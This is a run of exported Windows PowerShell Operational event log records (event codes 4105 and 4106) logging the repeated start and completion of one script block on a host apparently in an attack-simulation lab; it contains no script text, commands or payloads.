SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475825
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475824
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475823
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475822
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475821
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475820
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475819
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475818
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475817
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475816
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475815
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475814
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475813
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475812
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475811
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475810
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475809
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475808
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475807
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475806
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475805
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475804
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475803
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475802
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475801
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475800
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475799
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475798
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475797
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475796
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475795
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475794
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475793
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475792
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475791
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475790
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475789
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475788
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475787
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475786
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475785
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475784
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475783
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475782
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475781
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475780
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475779
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475778
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475777
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475776
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475775
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475774
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475773
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475772
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475771
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
